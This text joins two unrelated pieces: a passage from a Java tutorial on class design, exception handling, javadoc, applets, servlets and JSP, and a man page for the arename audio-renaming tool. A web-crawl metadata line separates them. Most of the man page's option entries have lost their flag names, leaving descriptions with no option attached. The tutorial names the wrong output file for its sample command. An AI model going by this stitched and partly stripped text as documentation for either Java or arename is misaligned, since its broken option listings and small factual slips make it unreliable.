This option is a short hand for "--verbosity 10".
This option is a short hand for "--verbosity 5".
This is a short hand for "--verbosity 20".

The names arename gives the destination files are defined in "Configuration files", by the template and comp_template settings (see "SETTINGS").
Since version 4.0, arename supports a lot more file formats than it used to (version 3.0 only supported .mp3, .ogg and .flac files). Thanks to Audio::Scan, we now support a much wider range of file types, of which most may exist using different file name extensions (e.g. *.ogg and *.oga are both of the type ogg).
You may use the `--list-file-types' and `--list-ext-for-type' options to find out which file type is mapped to which file name extensions.
If you would like support for another file type in arename, you will have to persuade the Audio::Scan developers to extend their module with said feature. Adding support for it in arename after that should be trivial.
To give you an idea, arename (in connection with Audio::Scan 0.85) lets you rename mp3, mp4, aac, ogg, flac, asf, musepack, monkey audio, wav (this type also supports aiff) and wavpack files.

When invoking arename via find(1)'s -exec action, note that GNU find, for instance, did not support the + way of terminating -exec for a long time. If you are stuck with an old version, you can exchange the + with a ; (note that a semicolon must be quoted in any case).

Templates are described in the "TEMPLATE" section; reading that section is the minimum effort you will want to go through.
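The two -exec spellings discussed above look like this in practice (the directory name is illustrative):

```
$ find Music -name '*.mp3' -exec arename '{}' +
$ find Music -name '*.mp3' -exec arename '{}' \;
```

The second form starts one arename process per file, while the first batches many file names into each invocation, which is considerably faster for large collections.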
After that, you can open the file ~/.arenamerc in your favourite text editor and create a configuration that resembles the following text (and presumably change the few values in there to your liking):

    # a minimal ~/.arenamerc; the values are illustrative
    template &artist/&album/&tracknumber - &tracktitle
    comp_template va/&album/&tracknumber - &artist - &tracktitle

If you want to hook custom code into arename's processing, the "HOOKS" part even further below is for you.

arename also reacts to a few environment variables. Setting ARENAME_LOAD_QUIET suppresses arename's start-up output; the variable being absent from the environment will cause arename to start up in its normal manner.
When set to 1 (and only 1; arename will ignore any other setting), arename will turn off its output colourations. As of version 4.0, arename uses Term::ANSIColor to produce output that features terminal colours.
arename's behaviour can be altered by a number of files it reads when starting up.
Normal configuration tasks are done in (how convenient) \*(L"Configuration files\*(R", described below.
If you need more control, or want to solve special problems you are having, you can do so by supplying Perl code in "Hook definition files":
The per-user normal configuration file (see also "User defined variables" below).
Profile related configuration files; read if PROFILENAME is active. They are read after an intermediate config file defined by --post-rc and a local config file (if enabled).
Profile related "Hook definition files" (see below for details); read if PROFILENAME is active. These files are read between global and local hook-definition files.
In order to define profiles, you need to use the profile keyword:
profile <name> <pattern>
Where name is a string that is used in the place of PROFILENAME.
# switch on verbosity
verbosity 20
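Putting this together, a hypothetical setup could look like the following; the profile name and pattern are made up, and the exact pattern semantics may vary between arename versions:

```
# in ~/.arenamerc: activate the "flacarchive" profile for work
# below this directory
profile flacarchive /home/user/music/flac*
```

Settings that should only apply while the profile is active then go into that profile's own configuration file, as described above.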
Defines global hooks, that are in effect in every directory if the usehooks option is set to true.
This allows you to define special hooks, that will only be applied for processes that run in the directory the local file is found (and if the uselocalhooks option is set to true).
For details about hooks in arename, see "HOOKS" below.
The following settings are supported in all configuration files.
Not all of them are usable in sections. The ones you can use in sections are: All default_* options, force, prefix, sepreplace, tnpad, comp_template and template.
Some tag types support setting the same tag multiple times. The scanning backends before arename 4.0 did not support such tags. When this option is set to false (default), arename gives up when it encounters such tags. When set to true, arename just uses the first value it encounters. For maximum control over how tags with ambiguous values are handled, you may use the `ambiguoustag' hook. (default: false)
If set, a given file name will be transformed to its cleaned-up absolute path. You may want to set this if you are using sections in the configuration. If you do not use sections, all this will give you is a performance penalty. (default value: false)
If set, arename will inspect all template and comp_template settings for possible problems. Unsetting this option probably only makes sense if you are working with templates within hooks and know what you are doing. Normal users will most likely want to stick with the default. (default: on)
Defines a template to use with files that provide a compilation tag (for 'various artist' CDs, for example). This setting can still be overwritten by the --compilation-template command line option. (default value: va/&album/&tracknumber - &artist - &tracktitle)
default_artist, default_album, default_compilation, default_genre, default_tracknumber, default_tracktitle, default_year Defines a default value for the given tag in files that lack this information. (default value: undefined)
If this is set to false, arename will continue execution even if reading, parsing or compiling a hooks file failed. (default value: false)
Defines a prefix for destination files. Setting this to '/foo/bar' results in destination files named '/foo/bar/Expanded Template.ogg'. This setting can still be overwritten by the --prefix command line option. (default value: .)
Tagging information strings may contain slashes, which is a pretty bad idea on most file systems. Therefore, slashes in tagging information are replaced with the value of this setting. (default value: _)
Like the `--suppress-skips' command line option, this disables messages for files that arename will skip because the file name would not change.
If this option is set, arename allows the use of abbreviated tag names in template and comp_template. See "Available expression identifiers" below for details. (default value: off)
This defines the width to which the track number field is padded with zeros on the left. Setting this to zero disables padding. (default value: 2)
If set to true, use hooks defined in ~/.arename.hooks. (default value: true)
If set to true, use hooks defined in ./.arename.hooks.local. (default value: false)
If set to true, read a local configuration file (./.arename.local), if it exists. (default value: false)
If set to true, configuration profiles will be used. If false, they are not. (default value: true)
One file type may be used for different file name extensions. For example, files matching *.ogg and *.oga will both be handled as type ogg in Audio::Scan (the information gathering backend, arename is using since version 4.0). When this option is set to true, a file matching *.oga would be renamed using .ogg as the extension, since its type is ogg. Otherwise, the original extension is left untouched. (default: true)
Integer option, that sets the verbosity of arename's output. The default value is `10'. The `--verbosity' option may be used to override this setting.
Switches on the dryrun option (if not enabled already), as soon as the configuration file parser encounters non-fatal warnings. This option was introduced to avoid destructive behaviour due to incorrect lines in any of the configuration files. (default value: true).
You can use the set command in arenamerc files. This way the user can define his own variables. The namespace is separate from arename's normal settings. (That means, you cannot, for example, overwrite the internal template variable with this command.)
These variables can also be used in hooks (see "HOOKS" below). Starting with version 4 of arename, user defined variables may also be defined within sections, which (just like normal options) makes them applicable only if said section is used for a given file.
arename's templates are fairly easy to understand, but powerful.
At simplest, a template is just a fixed character string. However, that would not be exactly useful, because then every file you would ever want to rename would be getting the exact same name. That is why arename is able to expand certain expressions with information gathered from the file's tagging information.
An expression basically looks like one of the following forms:
This is the `trivial' expression. It will expand to the information stored within the corresponding tag. If the tag in question is not available, the expansion of the template string will fail.
The `sized' expression. The length modifier in square brackets defines the maximum length to which the expression should be expanded. That means, if the artist of a file turns out to be 'Frank Zappa', then using '&artist[1]' will expand to 'F'.
This is the first complex expression, called `complex-default'. When the tag which corresponds to `identifier' is available, this expression will expand exactly like the trivial expression would. If it is not available though, the expansion doesn't fail; instead, the `default-template' string is expanded.
This expansion is called `complex-set-unset'. Again, what will be used during template expansion depends on whether the tag which corresponds to `identifier' is set or not. If it is set, the string set-template is expanded; if it is unset, the unset-template string is used.
Both simple expansions may be used with braces, like the complex expansions are:
This is equal to `&identifier'.
And this is equal to `&identifier[length]'.
Backslashes are special in template strings, because they are used to quote characters that bear special meaning (for example, to get an ampersand character, you need to use "\&"). To get an actual backslash in the resulting string, you need to use a backslash quoted by a backslash. A backslash on non-special characters is silently dropped.
In complex expressions, the strings called `default-template', `set-template' and `unset-template' are subject to regular template expansion. Hence, expressions like the following are possible:
"&{album?&album/!}"
If `album' were set, it would expand to its value followed by a slash; otherwise it would expand to nothing. Using this, it is fairly easy to deal with album-less tracks:
"&artist/&{album?&album/&tracknumber. !-no-album-/}&tracktitle"
That will effectively use the following template if `album' is set:
"&artist/&album/&tracknumber. &tracktitle"
But if it is not set, it will instead use this:
"&artist/-no-album-/&tracktitle"
Caution has to be taken if certain characters are to be used within conditional template expressions. For example, to use a closing curly bracket in either of them, it needs to be quoted using a backslash character.
Similarly, if an exclamation mark is to be used in a `set-template', it needs to be quoted by a backslash to avoid the character being interpreted as the end of the `set-template' string.
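The expansion rules above are straightforward to prototype. The following Python sketch is my own illustration (it is not arename's actual Perl implementation, and it ignores the `[length]' modifier and backslash quoting), but it shows the trivial, complex-default and complex-set-unset forms in action:

```python
def expand(template, tags):
    """Toy expander for arename-style templates (illustration only)."""
    out, i = [], 0
    while i < len(template):
        if template[i] != '&':
            out.append(template[i])
            i += 1
        elif i + 1 < len(template) and template[i + 1] == '{':
            end = template.index('}', i)               # closing brace
            name, q, rest = template[i + 2:end].partition('?')
            set_t, bang, unset_t = rest.partition('!')
            if not q:                                  # &{identifier} == &identifier
                out.append(tags[name])
            elif bang:                                 # complex-set-unset
                out.append(expand(set_t if name in tags else unset_t, tags))
            elif name in tags:                         # complex-default, tag set
                out.append(tags[name])
            else:                                      # complex-default, tag unset
                out.append(expand(set_t, tags))
            i = end + 1
        else:                                          # trivial form: &identifier
            j = i + 1
            while j < len(template) and template[j].isalnum():
                j += 1
            out.append(tags[template[i + 1:j]])        # KeyError if tag is missing
            i = j
    return ''.join(out)

template = "&artist/&{album?&album/&tracknumber. !-no-album-/}&tracktitle"
print(expand(template, {"artist": "A", "album": "B",
                        "tracknumber": "01", "tracktitle": "T"}))  # A/B/01. T
print(expand(template, {"artist": "A", "tracktitle": "T"}))        # A/-no-album-/T
```

Note how the second call falls back to the `-no-album-/' sub-template, exactly as described for the worked example above.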
The data that is expanded is derived from tagging information in the audio files. There are two kinds of information available. One is the purely informational tag (like a track's artist) and the other further describes the format of the audio file (like the file's bitrate).
If you are defining a lot of templates on the command line, you may find that these identifiers take quite a while to type. If the template_aliases option is set, you may use shorter alias names instead of the real identifier. Available aliases are listed with their corresponding identifier below.
This is a list of all informational identifiers available for all file-types:
The album the currently processed track is part of. (alias: al)
The artist for the current track. (alias: ar)
Compilation tags are not very stable across different file types. Usually, this is set to a string like "Various Artists" for tracks that are part of some sort of compilation album (like motion picture sound-tracks). (alias: cmp)
The genre or content type of the audio file. (alias: gn)
The track number of the current track; it is padded with zeros to the width configured by the tnpad option (see "SETTINGS"). (alias: tn)
The title of the currently processed track. (alias: tt)
Chronological information about the track (usually the year a song was written or the year the album a track is part of was released). (alias: yr)
Here is a list of the file-format information tags available for all file-types:
The bitrate the file was recorded/encoded with. (alias: br)
The number of channels available in the file (for example, this is `2' for stereo files). (alias: ch)
The length of the track in milliseconds. (alias: ln)
The samplerate the file was recorded/encoded with. (alias: sr)
For all file-types, the following tags are generated from the ones listed above (for convenience):
Kilobits per second (bitrate / 1000). (alias: kbr)
Kilosamples per second (samplerate / 1000). (alias: ksr)
The length of the track in seconds. (alias: ls)
Some tags are only available for certain file-types. They are always called `type_*'. File-type specific identifiers do not have alias names. Here is a list of those tags:
The word-size used in a flac file. `24' if samples are 24 bits wide.
The version of the id3 tag used in mp3 files (e.g. "ID3v2.3.0").
The same as `mp3_id3_version', but for wave files.
HOOKS ARE A BIG HAMMER THAT CAN CRUSH PROBLEMS AS WELL AS LIMBS!
You have been warned! Hooks are Perl subroutines defined in hook files (see "FILES"). They are run at certain events during the execution of arename. The contents of the argument list for each hook depend on which hook is called (see the "List of hook events" and "Utility subroutines" sections below).
The keys in various data hashes passed to the hooks can be one of the following: album, artist, compilation, genre, tracknumber, tracktitle, year.
Registration subroutines
There are two subroutines that are used to tell arename about the subroutines you defined that shall become hooks.
Registers a code reference (read: your subroutine) for the given event. Example: register_hook('startup', \&custom_banner);
Removes all entries of the code reference for the given event. Example: remove_hook('startup', \&custom_banner); If the coderef was added more than once, all entries are removed.
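arename's hooks are Perl subroutines, but the registration pattern itself is generic. Here is a rough Python sketch of what register_hook()/remove_hook() do (my own illustration, not arename's code); note that removing a hook drops every entry of it, even if it was registered more than once:

```python
_hooks = {}

def register_hook(event, func):
    """Register a callable to be run when `event` fires."""
    _hooks.setdefault(event, []).append(func)

def remove_hook(event, func):
    """Remove all entries of `func` for `event`, even if added twice."""
    _hooks[event] = [f for f in _hooks.get(event, []) if f is not func]

def run_hooks(event, *args):
    """Call every hook registered for `event` (event name is argument zero)."""
    for func in list(_hooks.get(event, [])):
        func(event, *args)

def custom_banner(event):
    print('Hello World. (from the %r hook)' % event)

register_hook('startup', custom_banner)
register_hook('startup', custom_banner)   # registered twice...
run_hooks('startup')                      # ...so the banner prints twice
remove_hook('startup', custom_banner)     # both entries are removed
run_hooks('startup')                      # prints nothing
```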
File access and manipulation
The currently processed file name can be accessed via two subroutines:
Returns the current file name as a string. This way, you can get the name of the currently processed file in every hook.
API for accessing arename's internal configuration
You can also access the configuration data of arename itself:
Returns the current value of setting. This is always a scalar value.
Change the value of setting to value.
A list of settings arename will use: canonicalize, dryrun, force, hookerrfatal, prefix, quiet, quiet_skip, readstdin, sepreplace, tnpad, usehooks, uselocalhooks, uselocalrc, verbose, verbosity, comp_template and template.
If you want to actually change these settings, you should have a profound knowledge of arename's internals. Be careful.
API for default_* settings
If you need to access the current values of the default_* settings:
Returns the value of default_tagname.
Returns a lexically sorted array of tag names of currently set default_* values.
Sets the value of default_tagname to value.
Miscellaneous subroutines
And finally, a few miscellaneous functions ARename.pm provides that might be of interest.
Return the appropriate template (normal versus compilation template) based on the data in the referenced data hash.
Return the expanded version of the template string. The information that is used to do the expansion is taken from the referenced data hash. Keep in mind that this function calls hooks itself. Avoid endless loops! See "Hooks when expanding the template" for details.
Makes sure directory exists. Think: mkdir -p directory.
Returns 1 if the tag tagname is supported by arename, 0 otherwise.
This tokenises a template string and then looks at the whole token tree, and tries to figure out any potential problems in it. If tokenisation already failed, a negative value is returned. In case of any warnings with the token tree, zero is returned. If nothing came up, a positive value is returned. This subroutine is called for the `template' and `comp_template' strings in all sections when arename starts. If the user chooses to change a template string in a hook it is recommended to use this function to avoid any errors due to broken templates.
Renames src to dest. Works across file systems, too. Dies if something fails.
This is a complete list of hook events with descriptions.
The first argument (argument number "zero") for every hook is the name space they are called in. To find out the name of the currently processed file, use the get_file() subroutine described above.
Hooks in the main loop
These hooks are called at the highest level of the script.
This is called in the middle of the file name canonicalization process (but only if the canonicalize setting is set). You can get the current file name via get_file(). The canonicalized file name is handed to you via the hook's arguments. The value from this argument will be assigned to the processed filename after the execution of this hook. Arguments: 1: canonicalized file name
Called at the start of the main loop before any file checks and canonicalizations (if enabled) are done. Arguments:
Called in the main loop after the file checks and canonicalizations are done. In this context, file checks means tests for read-access and for whether the processed file is a symlink. arename will refuse to process symlinks and files it cannot read. Arguments:
Called in the main loop after the file has been processed (unless filetype_unknown was triggered, see below). Arguments:
Called in the main loop after the file was tried to be processed but the file type (the extension, specifically) was unknown. Arguments:
Called when it has been established, that the file in question should theoretically be supported by arename. Arguments: 1: the current file name extension 2: the file type that has been detected
This is triggered directly before the actual file renaming process starts. All information about the file has been gathered at this point. Arguments: 1: the file type, 2: the extension that will be used to assemble the target filename, 3: the data hash
Hooks in the renaming procedure
When all data has been gathered, arename will go on to actually rename the files to their new destination name (which will be generated in the process, see \*(L"Hooks when expanding the template\*(R" below).
This is the first action to be taken in the renaming process. It is called even before the default values are applied. Arguments: 1: data hash, 2: file extension
Called before template expansions have been done. Arguments: 1: data hash, 2: file extension
Called after the template has been expanded and the new file name has been completely generated (including the destination directory prefix). Arguments: 1: data hash, 2: file extension 3: the generated new filename (including directory prefix and file extension)
The destination directory for the new file name may contain sub directories which currently do not exist. This hook is called after it is ensured that every directory portion exists. Arguments: 1: data hash, 2: file extension, 3: the generated new filename (including directory prefix and file extension)
Hooks when expanding the template
To generate the new file name, arename first tokenises the template string into a data structure, which is later used to assemble the target file name.
Called before any expansions are done. Arguments: 1: the template string, 2: the data hash
Called after all expansions have been done, right before the resulting string is returned. Arguments: 1: the template string (fully expanded), 2: the data hash
Called each time the value of an existing tag is expanded. This may be more than once, as tags may be used as often in a template as the user requires. At each point, this hook will be called right before the data was retrieved and post-processed (like zero-padding the `tracknumber' tag). Arguments: 1: the tag's name, 2: the data hash
Called each time the value of an existing tag is expanded. As with the `expand_template_pre_expand_tag' hook, this may happen more than once. At each point, this hook will be called right after the data was retrieved and post-processed. Arguments: 1: the value which will be used for expansion, 2: the tag's name, 3: the data hash
Hooks while gathering information
These hooks are triggered while the tag information is extracted from the audio files arename is processing. This is done in two steps. First the Audio::Scan module is used to scan for the raw meta data information from the current file. Then arename's data hash is being filled with that data.
This hook is called right before any scanning has been done. Arguments: 1: the type of the file being processed (`ogg' for ogg vorbis files)
This is triggered as soon as Audio::Scan is done processing the current file, but before arename's data hash has been filled. Arguments: 1: the type of the file being processed (`ogg' for ogg vorbis files), 2: the data structure returned by `Audio::Scan'
When the data hash is being filled it is possible that for one arename tag (like `artist') multiple values were returned by Audio::Scan. This hook is triggered as soon as such a tag with ambiguous values is processed. The hook may be used for maximum control over how ambiguous values are handled. To do this, the ambiguous value (passed as an array reference in the second argument) should be turned into the desired scalar value. If the array reference is left as it is, the usual `ambiguoususefirst' behaviour is followed. See the option's description for details. Arguments: 1: the name of the tag with the ambiguous value, 2: its current (ambiguous) value, 3: the data hash in its current form (obviously not all values will have been filled in at this point), 4: the data structure returned by Audio::Scan (see its documentation for details)
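In Python terms, the fallback behaviour described here could be sketched like this (an illustration only; arename itself does this in Perl on an array reference):

```python
def resolve_ambiguous(value, use_first=True):
    """Collapse an ambiguous (multi-valued) tag into a single scalar."""
    if isinstance(value, list):           # several values for one tag
        if not use_first:
            raise ValueError('ambiguous tag value: %r' % (value,))
        return value[0]                   # the `use the first value' behaviour
    return value

print(resolve_ambiguous(['Frank Zappa', 'The Mothers']))  # Frank Zappa
print(resolve_ambiguous('Frank Zappa'))                   # Frank Zappa
```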
Finally, the `post_fill' hook is called after the data hash has been filled. This is a good spot if post-processing the values of individual tags is desired. Arguments: 1: return code of the filling process (`0' in case of an error, `1' otherwise), 2: the type of the file being processed (`ogg' for ogg vorbis files), 3: the data structure returned by `Audio::Scan', 4: the data hash.
Miscellaneous hooks
This is triggered before values from the default_* settings are applied to missing values in the audio file. This hook is only run if a default value for a tag will be used! Arguments: 1: data hash, 2: the current key
The `startup' hook is called when the program starts; its arguments include the array of supported tags and the program's argument list.
Called at the end of the script. This is reached if nothing fatal happened. Arguments: 1: the program's argument list
This is a very simple example of a hook file that prints a custom banner and replaces all whitespace in the expanded template with underscores:
sub my_banner { print "Hello World.\n"; }
register_hook('startup', \&my_banner);
sub replace_spaces_by_underscore {
    my ($templateref, $datref) = @_;
    $$templateref =~ s/\s+/_/g;
}
register_hook('post_expand_template', \&replace_spaces_by_underscore);
Further examples can be found in the arename.hooks file of the distribution.
find(1), xargs(1), Audio::Scan.
This manual describes arename version 4.0.
Frank Terbeck <[email protected]>.
Please report bugs.
STRNCPY(3P) POSIX Programmer's Manual STRNCPY(3P)
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
stpncpy, strncpy — copy fixed length string, returning a pointer to the array end
#include <string.h>
char *stpncpy(char *restrict s1, const char *restrict s2, size_t n);
char *strncpy(char *restrict s1, const char *restrict s2, size_t n);
The stpncpy() and strncpy() functions shall copy not more than n bytes (bytes that follow a NUL character are not copied) from the array pointed to by s2 to the array pointed to by s1. For strncpy(): The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1‐2017 defers to the ISO C standard.
No errors are defined. The following sections are informative.
None.
None.
None.
strcpy(3p), wcsncpy(3p)
Pages that refer to this page: string.h(0p), stpncpy(3p), strcpy(3p), wcsncpy(3p) | https://www.man7.org/linux/man-pages/man3/strncpy.3p.html | CC-MAIN-2022-33 | refinedweb | 152 | 57.67 |
In this section we will discuss how to convert the boolean type to String. This example shows you how to convert a boolean value to String type. The String class, which lives in the java.lang package, provides a valueOf() method that converts the value into String type.
public class BooleanToString {
    public static void main(String args[]) {
        Boolean b = false;
        String str = String.valueOf(b);
        System.out.println(str);
    }
}
In the program, the valueOf() method of the String class takes the boolean value and converts it into String type; the program then prints the resulting string.
Posted on: June: Converting Boolean to String
Python decorator to measure the execution time of methods
As a Python developer you will often need to profile your application. In my current project my goal was to figure out the bottleneck in the code. For that I had to track the execution time of each method.
So in the beginning, I started by storing the current time in a start_time variable, letting the method execute, and then subtracting start_time from the current time to get the actual method execution time, as shown below:
start_time = int(round(time.time() * 1000))

employees = Employee.get_all_employee_details()

time_diff = current_milli_time() - start_time
debug_log_time_diff.update({'FETCH_TIME': time_diff})
There is no issue with the above code, but this boilerplate will keep growing when you have many method/function calls. At one point, it will be difficult to figure out the actual code; all you will see is the repetition of this pattern.
To overcome this, I created the @timeit decorator, which allows you to measure the execution time of a method/function just by adding the @timeit decorator to it.
@timeit decorator:
import time

def timeit(method):
    def timed(*args, **kw):
        ts = time.time()
        result = method(*args, **kw)
        te = time.time()
        if 'log_time' in kw:
            name = kw.get('log_name', method.__name__.upper())
            kw['log_time'][name] = int((te - ts) * 1000)
        else:
            print '%r %2.2f ms' % \
                  (method.__name__, (te - ts) * 1000)
        return result
    return timed
Adding decorator to the method
@timeit
def get_all_employee_details(**kwargs):
    print 'employee details'
The code will look like this after removing the redundant code.
logtime_data = {}
employees = Employee.get_all_employee_details(log_time=logtime_data)
Hurray!! All that messy code is gone and now it looks simple and clear.
log_time and log_name are optional. Make use of them accordingly when needed.
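For completeness, here is a self-contained Python 3 variant of the decorator together with the log_time usage (the sleep and the returned names are only stand-ins for a real database call):

```python
import time

def timeit(method):
    def timed(*args, **kw):
        ts = time.time()
        result = method(*args, **kw)
        te = time.time()
        if 'log_time' in kw:
            name = kw.get('log_name', method.__name__.upper())
            kw['log_time'][name] = int((te - ts) * 1000)
        else:
            print('%r %2.2f ms' % (method.__name__, (te - ts) * 1000))
        return result
    return timed

@timeit
def get_all_employee_details(**kwargs):
    time.sleep(0.05)                      # stand-in for the real DB query
    return ['alice', 'bob']

logtime_data = {}
employees = get_all_employee_details(log_time=logtime_data)
print(logtime_data)   # e.g. {'GET_ALL_EMPLOYEE_DETAILS': 51}
```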
P.S. Thanks for reading this far! If you found value in this, I’d really appreciate it if you recommend this post (by clicking the ❤ button) so other people can see it!.
In this post I don't want to outline all the changes that happened from v0.7 to the latest, v0.8, release. I want to start by emphasizing that the name of the
DOM namespace had to be changed to
Dom. I know that this may cause some confusion and maybe even frustration, but it is better to do it now, than doing it for the final v1.0 release.
That being said the
DocumentBuilder is still alive. It will probably stay alive and make it in the v1.0 release. It is unclear at the moment, since the builder is still the easiest way to construct a document. However, for v0.9, the
IBrowsingContext will be more interesting. The ideal way will probably involve creating a class that inherits from
Context or just implements
IBrowsingContext. The exact behavior is still to be specified.
Fixed issues
So let's have a look at the great fixes that made it to v0.8:
- v0.8 nearly doubled the number of unit tests. These also covered many CSS selectors, which resulted in fixing (or speeding up) some of them. It seemed like the nth-child selector(s) hadn't been working as they should. Now they do! See issue
- AngleSharp fixed a memory leak that will be discussed in detail below. Now AngleSharp is also really lightweight in memory consumption. See issue
- Encoding especially with chinese encodings such as GB18030 was problematic. Now AngleSharp handles all these cases correctly! See issue
- Another encoding issue with wrongly determined Shift_JIS (was in fact UTF-8). Now AngleSharp can handle such edge cases as well! See issue
- A memory leak due to leaving the response open has been handled. See issue
Finished features
AngleSharp v0.8 also fully implemented the
Url (including relative path / scheme detection, directory movements and more) type. Every link can now be normalized and trusted. Besides we now have full HTML5 constraint form validation, i.e. that attributes such as
required are correctly interpreted in dependency of the respective input type. All HTML5 input types (including
datetime and
datetime-local) are implemented according to the official specification. Their stepping behavior is also included.
Besides all those DOM features the parser has been optimized again. It can certainly compete with other solutions. To guarantee not only speed, but also memory efficiency a memory leak has been issued and fixed. It turned out that the code in AngleSharp was only part of the problem. What happened exactly?
Memory leak
The .NET garbage collector does not seem to recognize unconnected documents as being disposable. In the end that does not matter much. What we can do is to dispose the object manually. However, it turns out that this was not sufficient. The connected DOM had to be killed explicitly. So now I am removing all nodes that have been placed on the
Document. That helped a little.
What surprised me was that every spawned task, that had a continuation task, was the source of a massive memory leak. Once a DOM node had a continuation task, it could not be freed any more, resulting in other nodes not being able to be freed, thus starting a vicious circle of high memory consumption.
After just 3 minutes of runtime the memory consumption easily exceeds 100 MB. We also scratch the 100 MB mark if we explicitly dispose the document. In that case the following trend can be observed.
Of course, this is still unacceptable, especially if compared to other solutions like HAP.
In the screenshot above HAP only requires 32 MB after a few minutes. Fixing the issue by disconnecting the elements and replacing all continuation tasks, by elegant
async solutions that take
await, resolved basically all those leaks.
In the end we now have a performance that is practically in the same ballpark as the behavior experienced with HAP. However, it is still required to do the manual call to the
Dispose() method, or to use a
using construct.
Now AngleSharp only consumes 33 MB after 3 minutes, which is basically the same as offered by HAP, however, with a far more complete and accurate DOM, events, observers and much more.
Upcoming developments
The road to v0.9 will also include formal changes. Starting with v0.8 there will be NuGet preview releases, which will be available on a daily or weekly basis. Perhaps these pre-releases will be coupled to the CI system (which is AppVeyor in this case).
Coming with v0.9 or earlier will be a move of the repository. The current AngleSharp repository will be moved to an organization called AngleSharp (surprise!). The repository will then also be split up. Basically every repository will represent a solution and these solutions will communicate via NuGet releases only.
The AngleSharp.Scripting project for instance will become AngleSharp.Scripting.JavaScript, which will be placed in the AngleSharp.Scripting repository. The main idea behind this restructuring is of course to bring in more structure and provide an easier overview for newcomers. Also it should be pretty obvious that parts like the JavaScript engine integration are external projects, which build upon the core AngleSharp project.
Still, AngleSharp is searching contributors and welcomes every contribution. Feel free to write me any time if you are interested. | https://florian-rappl.de/News/Page/280/anglesharp-v08 | CC-MAIN-2020-10 | refinedweb | 881 | 59.09 |
Hi there,
I am trying to write a program to send an HTTP request (eventually to view the raw HTML page), but I can't seem to get my requests to send or receive properly. Initially when I ran this it would receive about 4190000 bytes (rough guess), but after running it a few times it now receives 0 bytes and I get the following output:
Unable to connect: Socket operation on non-socket
Error sending: Bad file descriptor
1 BYTES SENT.
Error: Bad file descriptor
-1 BYTES RECIEVED.
It seems strange that it was initially able to send data... although I may have accidentally edited something.
Any ideas? I'm presuming it's my code :(
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <string.h>
#include <stdio.h>

int main(){
    struct addrinfo hints, *res;
    int sockfd;

    // first, load up address structs with getaddrinfo():
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;      // use IPv4 or IPv6, whichever
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_flags = AI_PASSIVE;      // fill in my IP for me

    getaddrinfo("", "80", &hints, &res);

    // make a socket:
    if (sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol) == -1)
        perror("Unable to create socket");

    // bind it to the port we passed in to getaddrinfo():
    if (connect(sockfd, res->ai_addr, res->ai_addrlen) == -1){
        perror("Unable to connect");
        close(sockfd);
    }

    // send request
    char *msg = "GET /index.html HTTP/1.1\r\n Host:\r\n";
    int len, bytes_sent;
    len = strlen(msg);
    if (bytes_sent = send(sockfd, msg, len, 0) == -1)
        perror("Error sending");
    printf("%d", bytes_sent);
    printf(" BYTES SENT.\n");

    // receive response
    ssize_t i;
    ssize_t rcount;
    char buf[1500];
    rcount = read(sockfd, buf, 1500);
    if (rcount == -1)
        perror("Error");
    printf("%d", rcount);
    printf(" BYTES RECIEVED.\n");
    for (i = 0; i < rcount; i++){
        printf("%c", buf[i]);
    }
}
Creation of Webservice using NWDS:
This blog explains:
- How to Create Web Service
- Web Service Navigator
- Log Viewer
Software Prerequisite:
Install SAP NetWeaver Developer Studio on your system.
Create Web Service
To create a web service in NetWeaver Developer Studio (NWDS), follow these steps:
Step1:
Create a Dynamic Web Project in NWDS.
Go to New -> project -> Others -> Web Application -> Dynamic Web Applications
Step 2:
Create a Java class file and write its methods.
Step3:
Right-click the Java file and select Web Services -> Create Web Service. The Web service type will be "Bottom up Java bean Web Service"; the Service implementation will be the Java file from which you want to create the web service.
Web service type will be “Bottom up Java bean web Service, Service implementation will be the java file which you want to create web service.
Step 4:
Select the Server hyperlink; it opens the following window. There, select "SAP Server" and click OK.
Step 5:
Select the Web Service Runtime hyperlink; it opens the following window. Select "SAP Server".
Step 6:
Click “Next” button.
Step 7:
Enter the service name and click the "Next" button.
Step 8:
Check that the correct method names are displayed in the Method selection window; if so, click the "Next" button.
Step9:
Build the archive (EAR) file. Give the user name and password for deploying the EAR file to the server.
After the EAR has been published successfully to the server, you will get an alert message saying the deployment completed successfully.
Step10:
Click "Finish" to complete the web service creation in NWDS.
Web Service Navigator
Step1:
Open the page in a web browser.
Click “Web Service Navigator”
Step2:
Enter user name and password.
Step3:
Enter the service name in the Select Service text box and click the filter; if your service name is available, click the service name.
Step4:
A window opens with the web service method names; it contains the WSDL URL for the web service.
Step 5:
Select the method name to open the "Enter Input Parameters" screen, and enter the values for the method.
Press "Execute" to execute the web service; after execution, a result window opens to display the web service details.
Log Viewer
Step1:
Open:
Step 2:
Press the Availability and Performance Management tab.
Click Log Viewer.
Step 3:
In the Show drop-down list, select Custom View, then select Create New View.
Step4:
To filter the log file, select the "Filter by Content" option and set the path to "/Applications/WebServicesCategory".
hi, I have followed the steps to create the webservice, but was not successful.
What input needs to be provided in the "Specify Customizations for the Web Service" wizard for the fields Service name, port name, port type name and target namespace?
If you could please create a "helloworld" class with one method sayHello, take a screenshot of each step, and post that, it would be good.
Verry good blog.
Thanks for share that !!!
Thanks Ricardo
Hi Monika,
A great blog, thanks for sharing...
Thanks Gangandeep
Good job
Thanks Sunita
simply superb | https://blogs.sap.com/2014/01/03/creating-webservice-using-sap-nwds/ | CC-MAIN-2021-25 | refinedweb | 439 | 62.88 |
cfsetispeed()
Set the input baud rate in a termios structure
Synopsis:
#include <termios.h> int cfsetispeed( struct termios* termios_p, speed_t speed );
Since:
BlackBerry 10.0.0
Arguments:
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The cfsetispeed() function sets the input baud rate within the termios structure pointed to by termios_p to be speed.
You can get a valid termios control structure for an opened device by calling tcgetattr().
- The new baud rate isn't effective until you call tcsetattr() with this modified termios structure.
- Attempts to set baud rates to values that aren't supported by the hardware are ignored, and cause tcsetattr() to return an error, but cfset).
Errors:
- EINVAL
- One of the arguments is invalid.
- ENOTTY
- This function isn't supported by the system.
Examples:
